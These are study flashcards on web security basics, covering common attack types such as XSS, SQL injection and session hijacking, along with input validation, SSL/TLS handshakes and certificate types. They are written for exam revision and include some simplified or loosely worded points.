Web Security Flashcards
Why would an attacker target my site?
- Read private data (user names, passwords, credit card numbers, grades, prices)
- Change data (change a student’s grades, prices of products, passwords)
- Spread viruses and other malware
- Damage or shut down the site, so that it cannot be successfully used by others
- Harm the reputation or credibility of the organization running the site
- Spoofing (pretending to be someone they are not)
Some Security Recommendations:
- Examining page source code on the server-side script
- Examine network traffic and AJAX requests
- Listen to white hat hackers
- Assume that the attacker knows about web dev and has the same tools you have
- COMPLEXITY INCREASES SECURITY RISK
Awareness + Protection = Security
assume nothing; trust no one
A selection of attack types
- Denial of Service (DoS): Making a server unavailable by bombarding it with requests
- Social Engineering: Tricking a user into compromising the security of a site (e.g. phishing)
- Privilege Escalation: Causing code to run as a “privileged” context (e.g. “root”)
- Information Leakage: Allowing an attacker to look at data meant to be confidential
- Man-in-the-Middle: Intercept, and read and/or manipulate that traffic
-
Session Hijacking: Stealing another user’s session cookie to masquerade as that user
- an attacker can listen to the network, get your session ID cookie, and make requests to the same server with that same session ID cookie to masquerade as you (example: Firesheep)
-
Cross-Site Scripting (XSS) or HTML Injection: Inserting malicious HTML or JavaScript content into a web page
- injected script code can:
- masquerade as the original page and trick the user into entering sensitive data
- steal the user’s cookies
- masquerade as the user and submit data on their behalf (submit forms, click buttons, etc.)
- injected script code can:
- SQL Injection: Inserting malicious SQL query code to reveal or modify sensitive data
Securing against HTML injection / XSS / SQL injection
- disallow harmful characters
- HTML injection is impossible without < >
- allow them, but escape them
- preventing blank values (such as for email)
- ensuring the type of the value (integer, date, etc.)
- ensuring the format and the range of the values (e.g., postcode format)
- ensuring certain combinations of values fit together properly
Securing against SQL injection specifically
- escape the string before you include it in your query
- replaces ‘ with ', etc., and surrounds with quotes
- sanitising user input
- using prepared statements (i.e. pre-compiled SQL query template that can be filled)
- limiting database permissions (e.g. principle of least privilege)
Client-Side Validation vs. Sever-Side Validation
+ what is used respectively
Client-Side Validation
Two ways:
- Implicit: Having the browser automatically enforce certain limitations (e.g. choosing a buttons rather than a text field).
- Explicit: the validation is done by the page’s author through JavaScript.
Server-Side Validation
- Regular Expressions are used in server-side validation. (A sequence of characters that define a search pattern.)
definition and characterstics of SSL and TLS
asymmetric cryptographic protocols designed for secure communication over a computer network.
- To use SSL a certificate by a certain authority is required and can cost up to couple of hundred dollars.
- Using SSL may have an impact on performance because encrypting and decrypting messages consume CPU time and memory.
explain the SSL or TLS handshake
between an SSL client and SSL sever
- Client contacts sever
- Server responds with server certificate
- Client checks certificate and cryptographic parameters
- Client sends secret key encrypted by public key + client certificate
- Server verifies client certificate
- Client and server signal that everything is checked
- Message is shared with shared secret key
list 3 types of certificates
Domain Validation (DV) - Certificate Authority (CA) checks only the domain name.
Organisation Validation (OV) - CA checks domain and vets some information about organisation.
Extended Validation (EV) - CA checks domain and conducts thorough vetting of multiple aspects of the organisation, according to strict guidelines.
How are the HTTP POST and GET methods related to security?
In forms,
HTTP POST requests supply additional data from the client (browser) to the server in the message body.
GET requests holds all data in URL, which is much less secure.
What might different error messages in browsers reveal to attackers?
error 403 shows that the source exist and but is forbidden
this information can be useful for attackers
How can the page source be used for an attack?
the page source of websites might reveal valuable information for hackers, like commented out sections revealing person data
server-side vs. client-side security
server side languages are not seen by users — more secure
(JavaScript is both sever and client slide)
What are botnes?
(NOT NEEDED FOR EXAM)
When a hacker gained access to your computer/website, it will build in a backdoor for future access - creating an army of zombie computers that can perform any kind of task like data crunching, theft, etc.
In order to write secure code, we must assume:
- invalid input
- evil users
- incompetent users
- everything that can go wrong, will go wrong
- everybody is out to get you
- botnets, hackers, script kiddies, KGB, etc. are out there